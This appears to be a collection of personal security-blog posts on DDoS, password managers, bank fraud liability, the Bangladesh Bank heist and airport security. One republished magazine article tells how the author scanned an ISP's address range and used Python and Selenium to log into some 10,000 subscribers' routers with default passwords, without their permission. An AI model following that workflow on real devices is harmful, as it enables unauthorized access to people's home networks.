comment 0

Internet of shitty things!

b66b95478fBrian Krebs is the most reputable name in CyberSecurity reporting, his krebsonsecurity website is the best source of ‘real’ journalism on the subject.

But reputation works both ways, the same thing that makes him popular in some circles, makes him unpopular in other. He’s had criminal hackers send him heroin in the mail and even have SWAT teams descend on his home with guns all blazing (in a phenomenon called swatting!). Reporting and exposing underground cyber-criminals comes at a price, you don’t piss of darknet crime lords without taking a few hits along the way.

The problem though is when those ‘few’ hits, turn into a hurricane of web traffic aimed at your server, because that’s exactly what descended on Krebs’ server late last week, when krebsonsecurity was hit by an epic DDOS attack

DDOS is an acronym for Distributed-Denial-of-Service, which basically means forcing so much web traffic to a single website that it eventually collapses–making it unable to provide services to the ‘real’ visitors of the site. All websites run on servers with finite capacity, a DDOS attack is about sending enough traffic to those servers that they eventually fail.

But this DDOS was different, and krebsonsecurity will go down in history as the Hiroshima of DDOS attacks, because for the first time in history we’re seeing a new type of weapon. One that once revealed cannot be un-revealed.

Now there were DDOS attacks in the past, but this attack on Krebs was different for 3 reasons.

comment 0

Hotline Jais is a terrible idea!

Jais recently launched anew mobile app to allow the public to easily report any crimes that contravene syariah laws.

Obviously there’s social and legal implications here, which I won’t go into, but we need to understand just how stupid this idea is.

When you ask amateurs to give you security, what you eventually end up with is amateur security.

It’s the reason why Maths professors from Ivy league universities are wrongly profiled as terrorist, or why breast milk is incorrectly identified as explosive substances on planes, why it doesn’t take an evil genius to break into your gated and guarded housing project. Security is hard, and if you entrust into the hands of amateurs, things don’t end well.

Having a ‘app’ where people can report anything that contravene’s their morality is a sure-fire recipe for disaster, and I don’t think Jais have the infrastructure nor the processes to fully receive all the complaints and run a proper check on each of them.

And when it has real legal implications for Muslims (even non-Muslims), then they need to take that shit off the Playstore.

Link here.

comment 0

All you eggs in one basket

Is it wise to use an online password manager? After all, putting your passwords on the cloud seems like a really dumb idea.

But I use password manager because while storing stuff on the cloud may present risk, it’s far riskier and dumber to re-use passwords.

Why you need a password manager?

Despite the sexiness of zero-day exploits and hardcore state-sponsored hacking groups we see on the news, the number one way the average person gets hacked is through password compromise (boring!). That’s when hackers guess, or somehow figure out your passsword, and then use it to access the various online services you subscribe to.

Most people downplay the risk of this happening, ebcause they think they’re not rich enough, or famous enough to be the target of hackers. But in an era, where hacks compromise millions of accounts, and hackers can automate exploits to run on cheap cloud servers from Amazon–you’d be surprise what hackers consider a worthwhile target.

But how do hackers get your password?

On occassion they actually guess it, ala ‘the fappenning’, but more commonly they get your passwords by hacking other services. Shockingly, sometimes the easiest way to get your Google password is to hack dodgy forums, and insecure chat rooms that litter the internet.

comment 0

The safest place for your money is under the mattress


When I was in school, we joked about people who kept their money under the mattress, that somehow those who didn’t use banks were less intelligent than people who did.The general thinking was that smart people kept their money in the bank, where it was safe from theft, fire and flood, while still collecting interest.

In the 80’s this was a compelling argument, when interest rates were high and banks really did provide security,but is that thinking still applicable today?

In June of 2000, Maybank launched their ‘new’ internet banking platform, Maybank2u, which allowed their customers to do their banking online, outside of traditional branches or even ATMs. Few years later, it begun offering online purchases and soon after the mobile app was launched.

But while online banking platforms brought convenience, they also introduced new security threats — and it wasn’t clear whose job it was to secure against those new threats, and who would be liable for inevitable financial losses.

Was it going to be bank who assumed liability, just like they did before, or would it be the account holder, or possibly a mixture of both?

The answer depends on who gets attacked, because not all attacks are equal.

Not all attacks are equal

There’s two types of attack, one where the bank itself is attacked, and another where the account holder is targeted instead.

When someone walks into a bank  with the threat of violence, and walks out with $30,000 of the banks cash, the bank absorbs all the loses. After all, that’s why your money is in their safe and not under the mattresses.

507d7acb92f46ed8d8779be14e3f2051But there exist another class of attack–customer impersonation, where the attacker isn’t threatening violence or even ‘attacking’, but trying to fool the bank into believing they are the rightful account holders. In other words, the attacker is trying to impersonate you, to get to your money.

And in the digital world, customer impersonation is far more common. Consider the case of ATM fraud.

ATMs identify a user by verifying their ATM cards, and then prompting them for the PIN. More specifically, the ATM first authenticates the inserted ATM card (is this card real?) and then proceeds to ask the user for the PIN (is the person the accountholder?), once an ATM is satisfied, it then proceeds to grant the user access to the account.

Hence if an attacker managed to steal your card and knows your PIN, the ATM has no way to differentiate between you and the attacker. Anyone could take your money from your account, by just having your ATM card and PIN, in contrast robbers attacking a bank would simply be taking the bank’s cash…not yours.

Credit Card fraud is another prime example, but at least in Malaysia end customers have their liability capped at RM250 provided they report their lost cards in a ‘reasonable’ amount of time. For debit cards and ATM cards are not protected in the same way. Which is strange because the poorer sections of society who need more protection usually have debit instead of credit cards.

But even credit card users need to be wary, because changes in the liability model are bound to happen when we introduce Chip and Pin. (read more here)

To summarize, customer impersonation isn’t the same as a bank robbery, when the bank issues you credentials (like PINs, passwords or ATM cards), the responsibility to secure those credentials are yours–and if those credentials are compromised, then you’ll have to shoulder some of the financial losses as well.

comment 0

Michael Hayden on interesting points

Some interesting points:

  1. Non-nation state actors now pose a significant threat to nation states
  2. Historical threats usually associated with bad nation states, can now be executed by non nation-states
  3. Industrial Era, was about a consolidation of power, in the past only the Government could run something as complex as a phone network
  4. In a Post-Industrial Era, it’s about the decentralization or power–today, modern economies privatize and decentralize important things like the phone network. (my comment: The internet is the epitome of this, a fully decentralized network controlled by no one single entity)
  5. American Foreign Policy, Power Projection and Defence has been fully focused on hard power against nation states (hard power =  men with guns)
  6. In order to address the threat of non nation-states, the US government has pivoted it’s attack vectors and tactics
    • Yesterday  : Killing someone from a foreign army in a designated war-zone
    • Today : Drone Strikes on enemy combatants that aren’t fully recognized
    • Yesterday  : Capturing Foreign combatants and imprisoning them
    • Today : Guantanamo
    • Yesterday : Intercepting enemy communications, disabling and sabotaging
    • Today : Programs that Edward Snowden revealed
    • (my comment: I don’t think the full surveillance of domestic internet traffic was a good idea)
  7. We’re seeing the melting down of Post WW2 and Post WW1 global order, and maybe even the breakdown of Westphalian nation-states…ISIS is a response to Westphalian ideas of separation of church and state.
  8. There is a fundamental similarity between what Christian Europe faced in the 16th-17th century and what the middle east today, both sides are debating the relationship between religion and power.
  9. Christian Europe had the answer of separating them—we call this separation, modern!
  10. No guarantee that Islam in the Middle East will come to the same conclusion, i.e. they may never become modern.
  11. Less important stuff about Nuclear power, about how Russia is adopting a Nuclear first option, and considering it de-escalatory. And Hayden doesn’t like the Iran Deal, and not a big fan of Pakistan.
  12. American foreign policy makers like Hayden are more concerned with Chinese failure than with Chinese success. Political, Economical and Social factors may hamper the growth of China, but a failure of the regime is going to a massive problem for the world, while a success for China would a relatively smaller impact that can easily be folded into the world order.
  13. The Chinese claims on the 9-dash line, is a nationalistic approach to remedy the economical slowdown (Hayden’s opinion), what’s more interesting is that this is a diplomatic error, and ASEAN countries are running back to America to balance China’s power.
  14. Fundamentally though, China has no reason to be an enemy of the US
  15. His last slide on American foreign policy, the 4 different president types, as a fan of Wilson, and a World War 1 History freak—that was awesome!! I think one of the best historically precise frameworks for understanding US foreign policy, that isn’t based just the last 20 years
  16. Only one country supports targetted killings by the US—Israel.
comment 0

Anonymity and IP addresses


This week, I’ll put the final touches on my move from Malaysia to Singapore.

So, I felt it would a good idea to read through some Singaporean tech articles to see how tech events played out on the little red dot, and offer some unsolicited  and completely useless advice on them.

It wasn’t easy shifting through a boat-load of gadget reviews masquerading as tech journalism (I guess some things are the same in every country), but underneath the hundreds of phone reviews and fiber broadband comparison, I found a little interesting report on illegal downloads.

The Singapore Straits time reports that:

A local law firm that started proceedings to go after illegal downloaders in Singapore on behalf of two Hollywood studios said it will cooperate with the local authorities to ensure no abuse of process.

It follows a rare intervention by the Attorney-General’s Chambers (AGC) in civil applications made by Samuel Seow Law Corp (SSLC) in the High Court last month.

“We will work with the local authorities to ensure that there will be no unnecessary alarm to consumers who receive the letters of demand we plan to send out,” Mr Samuel Seow, managing director of SSLC, told The Straits Times yesterday.

This is just a re-hashed version of what happened last year in Singapore, when the same law firm went after downloaders of another movie, the difference is that this time they’ll be doing it under the watchful eyes of the AGC.

There is something to be said here about copyright-trolling, the abuse of power and the bullying tactics usually involved. But, we’ll leave that discussion for another day.

Today, I want to explore a little bit about anonymity and how many people have a mistaken notion about what it is.

comment 0

Random thoughts

You’ve probably heard of the hackers who almost got away with $1 billion, only to be thwarted by a typo. (if it weren’t for those meddling keyboards!)

What you probably didn’t hear was that they had already wired $100 million to themselves, are assumed to have pocketed anywhere from $21 million to $81 million in cold hard cash.

Sure, Billions is more than millions, but one a single hack that returns $21 million is a good pay-day by anyone’s standards.

The group managed to hack into the Bangladesh Central Bank, and gained access to specific machines on their network. From there they wired payment instructions over the Swift network to transfer nearly $1 Billion dollars in cash, all from a bank with just $28 Billion in foreign exchange reserves.

These were not 2-bit hackers who were foiled by typo’s, this was a well targeted attack, that would have probably occurred even if the bank upgraded their switches from $10 D-links to $100,000 Cisco routers, it wouldn’t have made a difference. The BAE report on the breach made for some interesting bed-time reading, but what really struck me was that the hackers were smart enough to suppress print-outs of confirmations, thereby ensuring no bank employees knew of the breach.

Each payment instruction generates a paper print out for employees to verify physically, but because that paper printout was generated by the same comprimised software, it was trivial to suppress.

But Hacking is one thing, knowing how to wire the money anonymously in a heavily regulated banking system is another.

The hackers had figured out that the best way to smuggle out millions of dollars was via casinos in the Philippines, that aren’t covered by anti money-laundering laws. This knowledge isn’t something that appears on last week’s Jeopadry, or a question you pose on Reddit, it’s something that only insiders know about.

Oh, and by the way, another $20 million was routed to Sri Lanka, suggesting there are other avenues to launder money out of the system from that Island nation as well.

But just who are these sophisticated hackers?

The Philippines Senators who had a hearing on the incident suggested that the perpetrators ‘could’ be Chinese. And while there’s probably a conflict of interest in their statement (nobody wants to admit that there are criminals in their own borders), evidence does seem to suggest it’s at least a likelihood.

And if I were to put on my tin-foil hat for a while, we may be able to correlate this attack to something that occurred late last year, keep in mind though this is venturing deep in the crazy woman with cat territory, and you have been warned.

So with that warning, let me take you back to good ol’ 2015.

In September of that year, President Obama and President Xi had a ‘broad agreement’ that both nations will no longer hack each other for ‘commercial purposes’. Nationwide espionage and intelligence gathering was still OK, but intentionally targeting corporations for their intellectual property was not.

Of course, the agreement was a bit vague on specifics, if Chinese hackers were to target Lockheed Martin to obtain the designs for the F-35 fighter — would that be considered commercial?

But overall the agreement was clear that both countries would not use hacking to advance their commercial interest. Keep in mind, that both countries vehemently denied they ever did this, so in essence the statement was merely formalizing something both countries have always denied doing–sort of saying we promise never to do the things we never did in the first place.

To give you a flavor of corporate espionage, I recommend reading a brilliant post titled “Stealing White” by Del Quintin Wilber from Bloomberg. It’s a long read (almost 4000 words long), which involves a Malaysian trying to steal the secrets of Titanium Dioxide production from Dupont. Apparently Titanium Dioxide makes a perfect white, that is the envy of all other whites, but the plot of stealing the manufacturing secrets of this perfect white is elaborate enough to make Wile E. Coyote green with envy, and just like in the cartoons it fails.

The Bloomberg piece concludes with an interesting point “the Chinese may have gotten what they needed directly from the chemical company. Newly filed court documents reveal that the FBI motel raid found evidence DuPont’s computers had been hacked.”

So elaborate espionage didn’t work as effectively as simply hacking into the source and getting it directly, and for a long time it was assumed that these breaches were executed by the hackers from the Chinese Government themselves. Think of it as a special arm dedicated to corporate espionage.

Of course, let me re-iterate that this is merely hypothetical, and let’s also not forget that the Snowden leaks suggest that the NSA was also in on the corporate espionage game, and spied on Corporate entities like Brazil’s Petrobras.

And here’s where the tin-foil comes in.

If China did indeed have a corporate espionage arm (not saying they did), and that arm was disbanded back in September due to the agreement with the US–what would happen exactly?

Well you’d think hundreds (if not thousands) of well-trained hackers, who specialized in the breaching of corporate networks would soon be out of jobs. And since hacking, especially government level hacking, isn’t exactly a generic skill set you can use to job-hop around, the most likely scenario would be that these hackers soon become freelancers.

And freelancers sooner or later coalesce into well organized teams which high levels of knowledge and expertise.

But what kind of heist could a group of well-trained, highly skilled, out of a job hackers do?

Hypothetically they could infiltrate a financial organization and start routing money to themselves–maybe? Identifying flaws in the global monetary system and using them to steal about $1 Billion from bank in Bangladesh?

Just maybe.


comment 0

2600 article

*A republication of my article on 2600, a hacker magazine*

Greetings from Malaysia.

This is my first time writing to 2600, although I’ve been a kindle subscriber for more than 2 years now.

For my first article, I hoped to write about a little hacking expedition I embarked on a couple of months back to help me improve my coding skills as well as help me learn more about local internet users.

Malaysia got onto the internet scene much later than most developed countries, our first ISP was only founded in 1992, and even then it was pretty much exclusively dial-up. Soon the local telecom company, Telekom Malaysia (TM) got into the ISP business and basically killed every other player because as the incumbent Government-owned telecommunications company, it alone had access to the phone lines of every Malaysian household.Until very recently, phone lines in Malaysia were owned by the Federal government through Telekom Malaysia, and it was only in the late 90’s that a privatisation plan opened that up.

During the days of dial-up over PSTN, and even after ADSL connectivity (which still ran over PSTN lines), TM held a monopoly over all internet subscribers in the country, simply because it owned the phone lines. Other ISPs struggled to penetrate the market, because their offerings couldn’t compete with the scale and unfair advantage of TM.

Fortunately, that all changed when TM was laying down fiber-optic cables. As part of a deal, TM secured a government subsidy to fund the fibre infrastructure but was forced to allow other ISPs to utilize the last-mile. In theory this would have increased competition and provided a more level playing field–which it did. But, TM was slow in opening up the last-mile, and manage to get a head-start of around 400,000 subscribers before any other ISP began to offer a Fiber to Home internet connection.

Why am I telling you this?

Because TM doesn’t really prioritize security, and I discovered a near perfect storm of security lapses that may prove costly to TM at some point.

As a ‘legacy’ ISP in the country, TM was around when IP addresses were cheap, and IPv4 exhaustion was a prediction not a reality. Hence it managed to secure for itself nearly 2.5 Million IP addresses from IANA. This abundance of IP addresses meant that TM offers all its customers a public facing internet IP by default, something all other ISPs in Malaysia offer only on request of the subscriber. I won’t go into the details of NAT-ing here, but you can Google it if you’re interested.

Secondly, as part of a Fibre subscription, TM provide a Modem and WiFi router, which is nothing out of the ordinary, except that TM sourced all their routers from just 2 manufacturers, and each manufacturer provided only 1 router model. From a security stand-point having an entire population of a single device isn’t a good thing, because a single exploit could take them all out at once, akin to the super-viruses we hear about that could make entire crops extinct because there’s so little genetic biodiversity in industrial agriculture.

Thirdly, TM provide a TV box for free and paid channels streamed to your TV. Problem is, that the TV box requires a complex VLAN segmentation and setup on the router, meaning most routers won’t support the TM Fiber offering. This forced most (or all) TM subscribers to continue using whatever router TM provided them in the first place, without the ability to swap the router for a more secure or feature rich one.

All in all, this meant that all of TM’s 600,000 fibre subscribers (at the time of writing this) were connected directly to the internet via a Public IP, and most of them continued to use one of the two routers supplied by them.

So far, nothing too exceptional here, except for two last bits. All the routers were configured to allow access from the WAN interface (i.e. you could configure the router from the internet), and all the routers were setup with one of a 5 different username/password combination by default. The default passwords (as you may have guessed) were rarely changed, and most users were left completely vulnerable to attack on a device they never even considered would be a target.

In 2007, while the fiber offering was still very new, several hackers in the Malaysia alerted TM to the ‘flaw’ in their operating model, but TM maintained that the WAN interface was necessary for ‘maintenance and support’, although they did promise to change all passwords to a unique password per router.So here we are in 2015, and I wanted to see just how honest TM were in keeping that promise.

First I had to get the list of IP addresses that belong to TM, a quick Google search revealed that TM was AS4788. AS stands for Autonomous System, a sort of internal network within the internet and used primarily for BGP routing. BGP is the border gateway protocol, which defines how IP packets are routed between AS nodes, and the great thing about it is that all this information is public, meaning you can easily determine TM’s IP addresses.

Once I had the list of IP addresses I quickly created a python script to loop through each individual IP, and determine the http-header of the end device on that IP (if there was one in the first place). I queried only port 8080, to save time. Since TM had only 2 router models, it was pretty trivial to validate the http-header and see if the IP was hosting a vulnerable TM router. A more professional approach would be to use zmap, or Shodan, but creating your own scripts to do this has it’s advantages in learning.

IP scanning was easy, and determining if indeed a particular router was on port 808o of a specific IP address wasn’t a tall hurdle to cross. The much harder portion was to actually test the hypothesis that most of the routers still used the default usernames and passwords. This meant I had to actually post data via http into the page from my python script. This isn’t usually a difficult task, but the routers themselves operated a large amount of javascript, and that just threw my python scripts into a tail-spin.

Try as I might, I couldn’t get it working using just python. Eventually I gave up trying to navigate the routers homepage, but then I found Selenium.

Selenium is a tool that allows you to “create robust, browser-based regression automation suites and tests”, in otherwords Selenium allows you to control a browser like FireFox or Chrome from a python script. This was the holy grail, because the web-browser would take care of all the Javascript nastiness for me, and now I could go deeper into the router configuration settings and poke around to determine other things, like do people even bother to change their WiFi SSID and password?

But Selenium has a performance drawback, a single python script querying a webpage, takes a couple MB of RAM, but a entire instance of Firefox kept open could consume a a few hundred megabytes, which severely limited my ability to scale the scanning. Even after discovering the tool, I tried to go back to just native python, but that Javascript stuff just threw me off.

Eventually, I wrote a whole script in Python, that would scan an IP range, determine if a router was present at the end of the IP (on port 8080), and then pass that to another script that would use Selenium to interact with a Firefox browser to visit the routers webpage, try the handful of default username/passwords and determine if any of them worked. And they DID!!

Of course, while I was in, I poked around to determine things like WiFi SSIDs, etc, but mostly for fun, and I made it a point not to change any setting on the router.

But there’s no way I could scale all of this on my home PC, or even my laptop. So, I decided to host this on the cloud, and chose to use Amazon–specifically a Windows instance on Amazon.

Initially, I decided to host this in Singapore–made sense since I was visiting Malaysians IPs, but then I realized that the Oregon data center of Amazon had much cheaper rates than the Singapore one–so I changed my decision and hosted in Oregon instead. IN some cases this was a 20% reduction in cost, and the expense of ‘slightly’ more latency, but my application wasn’t latency sensitive, as much as I was price-sensitive 🙂

Then in true, cheap-skate fashion, I decided to toy with Amazon spot instances–this a special deal from Amazon, where they would lease you un-utilized machines to the highest bidder, and you can get this for nearly 50% the price of the ‘on-demand’ Amazon instance. The only down-side is that Amazon reserves the right to terminate your instance at anytime–but from my experience of using this, and from the blogs I read, the chances of that happening were pretty slim.

I’ve run nearly 10 of these so far, and every time I spin up a spot-instance, it’s never been auto-terminated. Pretty decent deal–the only real down-side is that a spot-instance usually takes about 3-5 minutes to launch, due to the bid processing. But other than that it’s as good as a on-demand instance 🙂

With a very powerful Amazon instance, that had a large amount of RAM, I could spin up a large number of instances of Firefox to do my bidding. Using a simple Database to ensure all the instances weren’t visiting the same IP addresses, I was able to automate the whole process of ‘visiting’ TM routers with ease.

Eventually, a single large Amazon instance (procured through a spot-instance method), was able to hack through 10,000 routers in less than 12 hours for under $10.00. Quite a good return of investment if you’re looking to create your own little bot-net army.

TM have especially dropped the ball here, they now have at least 10,000 vulnerable routers floating on their network, waiting to be owned by the next Lizard Squad characters. I could have easily configured my script to turn-off the WAN interface on the router, to limit people’s exposure, but I thought against making changes on a host system without the owners explicit permission.

Hopefully if you’re from Malaysia and a TM subscriber, now you know, and you’re that yourself.

Selamat Tinggal from Malaysia.

comment 0

Two years on, teaching coding in schools declared a success

teach-codingKLANG: Two years on, the the pilot initiative to teach coding and digital security as an SPM subject has been touted as a resounding success, and the government is mulling a move to make it compulsory by 2020.

The announcement shocked parents, as out of 10,000 students who took part in the pilot program, only 10 had scored an A while the rest had failed with a grade of F.

Education Minister, Dato’ Seri Java, said that this reflects the current IT market, where out of 10,000 security consultants, only 10 will ever give you good advice.

“We benchmarked against the industry, and set the grading curve accordingly, so only a 10 students getting an A was the intention!! We can’t have cases where students just memorize a textbook and then score an A, this is not History or Geography, this is an important subject” he said, while further mocking drama and English literature under his breath.

Deputy Director of Education, Perl Ramachandran further added that instead of focusing on the 9,990 students who failed, the public should instead focus on the ‘A’ students who showed exemplary work and are were ‘bright spots’ in the dark abyss which is the Malaysian education system.

One such exemplary student was 17-year old lass Siti Pintu bt. Belakang, she had managed to install a backdoor into the MOE exam system and downloaded the question paper days before the exam. A backdoor is an application that allows an attacker unfettered access to the compromised system, and Siti managed to code one from scratch specifically for this purpose.

Already Russian cyber-criminal organizations are offering her scholarships to prestigious universities, Perl further added.

Then there Godam a/l Rajakumar, who instead of stealing exam papers, simply hacked into the MOE grading system and gave himself a ‘A’.

comment 0

More security theatre

So now, only actual travellers will be allowed into airports, and everybody else from your mother to your 3rd aunty twice removed has to say their teary goodbye at home rather than at the Airport KFC.

But why?

So that terrorist will now have to buy a ticket in order to blow up the airport? I can picture out now, “Al-Qaeda attempt to bomb KLIA foiled due to lack of funds for ticket purchase”


Do these people even consider just how easy it is to circumvent some of the ridiculous ‘security measures’ they put in place these days.  If all it takes for a terrorist to gain entry into an airport is a plane ticket, it’s not a very tall order for them to go out and buy one, or just print a fake copy good enough to fool the security officers.

We’d be spending countless of man hours, for security personnel on entry points scanning through useless documents with no real security in return.

What a waste–just like those women only KTM coaches that do absolutely nothing.